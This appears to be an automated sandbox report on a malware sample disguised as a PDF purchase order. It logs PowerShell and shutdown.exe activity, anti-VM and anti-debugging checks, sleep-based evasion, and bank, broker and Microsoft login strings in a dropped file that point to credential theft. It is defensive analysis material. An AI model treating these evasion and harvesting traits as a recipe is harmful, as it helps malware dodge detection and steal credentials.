                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: New PO [FK4-7173].pdf.exe PID: 5592, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 4540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 7060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 6A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 8060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: 96D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E rdtsc 4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5714Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2492Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeWindow / User API: threadDelayed 2882Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeWindow / User API: threadDelayed 7090Jump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\shutdown.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe TID: 3628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep count: 2882 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep time: -5764000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep count: 7090 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exe TID: 1576Thread sleep time: -14180000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -43000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\shutdown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026DC700 FindFirstFileW,FindNextFileW,FindClose,7_2_026DC700
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\V
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2037932132.0000000009540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmcI6ZuUrxlmbqYK6fl
                Source: 784DRh-0.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: use_countINTEGERVMware
                Source: 784DRh-0.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 784DRh-0.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: 784DRh-0.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 784DRh-0.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 784DRh-0.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 784DRh-0.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 784DRh-0.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 784DRh-0.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000283D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 784DRh-0.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 784DRh-0.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 784DRh-0.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 784DRh-0.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 784DRh-0.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 784DRh-0.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: firefox.exe, 0000000A.00000002.2508701810.000001CA0C0AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM4GP
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: MKVNVRSuoK.exe, 00000009.00000002.4472932779.000000000115F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                Source: 784DRh-0.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 784DRh-0.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 784DRh-0.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E rdtsc 4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00417A53 LdrLoadDll,4_2_00417A53
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA118 mov ecx, dword ptr fs:[00000030h]4_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA118 mov eax, dword ptr fs:[00000030h]4_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA118 mov eax, dword ptr fs:[00000030h]4_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA118 mov eax, dword ptr fs:[00000030h]4_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F0115 mov eax, dword ptr fs:[00000030h]4_2_011F0115
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov ecx, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov ecx, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov ecx, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov eax, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE10E mov ecx, dword ptr fs:[00000030h]4_2_011DE10E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01160124 mov eax, dword ptr fs:[00000030h]4_2_01160124
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C156 mov eax, dword ptr fs:[00000030h]4_2_0112C156
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C8158 mov eax, dword ptr fs:[00000030h]4_2_011C8158
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204164 mov eax, dword ptr fs:[00000030h]4_2_01204164
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204164 mov eax, dword ptr fs:[00000030h]4_2_01204164
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136154 mov eax, dword ptr fs:[00000030h]4_2_01136154
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136154 mov eax, dword ptr fs:[00000030h]4_2_01136154
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C4144 mov eax, dword ptr fs:[00000030h]4_2_011C4144
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C4144 mov eax, dword ptr fs:[00000030h]4_2_011C4144
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C4144 mov ecx, dword ptr fs:[00000030h]4_2_011C4144
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C4144 mov eax, dword ptr fs:[00000030h]4_2_011C4144
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C4144 mov eax, dword ptr fs:[00000030h]4_2_011C4144
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B019F mov eax, dword ptr fs:[00000030h]4_2_011B019F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B019F mov eax, dword ptr fs:[00000030h]4_2_011B019F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B019F mov eax, dword ptr fs:[00000030h]4_2_011B019F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B019F mov eax, dword ptr fs:[00000030h]4_2_011B019F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A197 mov eax, dword ptr fs:[00000030h]4_2_0112A197
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A197 mov eax, dword ptr fs:[00000030h]4_2_0112A197
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A197 mov eax, dword ptr fs:[00000030h]4_2_0112A197
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01170185 mov eax, dword ptr fs:[00000030h]4_2_01170185
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EC188 mov eax, dword ptr fs:[00000030h]4_2_011EC188
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EC188 mov eax, dword ptr fs:[00000030h]4_2_011EC188
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D4180 mov eax, dword ptr fs:[00000030h]4_2_011D4180
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D4180 mov eax, dword ptr fs:[00000030h]4_2_011D4180
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012061E5 mov eax, dword ptr fs:[00000030h]4_2_012061E5
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE1D0 mov eax, dword ptr fs:[00000030h]4_2_011AE1D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE1D0 mov eax, dword ptr fs:[00000030h]4_2_011AE1D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_011AE1D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE1D0 mov eax, dword ptr fs:[00000030h]4_2_011AE1D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE1D0 mov eax, dword ptr fs:[00000030h]4_2_011AE1D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F61C3 mov eax, dword ptr fs:[00000030h]4_2_011F61C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F61C3 mov eax, dword ptr fs:[00000030h]4_2_011F61C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011601F8 mov eax, dword ptr fs:[00000030h]4_2_011601F8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E016 mov eax, dword ptr fs:[00000030h]4_2_0114E016
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E016 mov eax, dword ptr fs:[00000030h]4_2_0114E016
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E016 mov eax, dword ptr fs:[00000030h]4_2_0114E016
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E016 mov eax, dword ptr fs:[00000030h]4_2_0114E016
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B4000 mov ecx, dword ptr fs:[00000030h]4_2_011B4000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D2000 mov eax, dword ptr fs:[00000030h]4_2_011D2000
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6030 mov eax, dword ptr fs:[00000030h]4_2_011C6030
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A020 mov eax, dword ptr fs:[00000030h]4_2_0112A020
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C020 mov eax, dword ptr fs:[00000030h]4_2_0112C020
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132050 mov eax, dword ptr fs:[00000030h]4_2_01132050
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B6050 mov eax, dword ptr fs:[00000030h]4_2_011B6050
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115C073 mov eax, dword ptr fs:[00000030h]4_2_0115C073
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113208A mov eax, dword ptr fs:[00000030h]4_2_0113208A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F60B8 mov eax, dword ptr fs:[00000030h]4_2_011F60B8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F60B8 mov ecx, dword ptr fs:[00000030h]4_2_011F60B8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011280A0 mov eax, dword ptr fs:[00000030h]4_2_011280A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C80A8 mov eax, dword ptr fs:[00000030h]4_2_011C80A8
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B20DE mov eax, dword ptr fs:[00000030h]4_2_011B20DE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C0F0 mov eax, dword ptr fs:[00000030h]4_2_0112C0F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011720F0 mov ecx, dword ptr fs:[00000030h]4_2_011720F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0112A0E3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011380E9 mov eax, dword ptr fs:[00000030h]4_2_011380E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B60E0 mov eax, dword ptr fs:[00000030h]4_2_011B60E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112C310 mov ecx, dword ptr fs:[00000030h]4_2_0112C310
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01208324 mov eax, dword ptr fs:[00000030h]4_2_01208324
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01208324 mov ecx, dword ptr fs:[00000030h]4_2_01208324
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01208324 mov eax, dword ptr fs:[00000030h]4_2_01208324
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01208324 mov eax, dword ptr fs:[00000030h]4_2_01208324
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01150310 mov ecx, dword ptr fs:[00000030h]4_2_01150310
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov ecx, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FA352 mov eax, dword ptr fs:[00000030h]4_2_011FA352
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D8350 mov ecx, dword ptr fs:[00000030h]4_2_011D8350
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
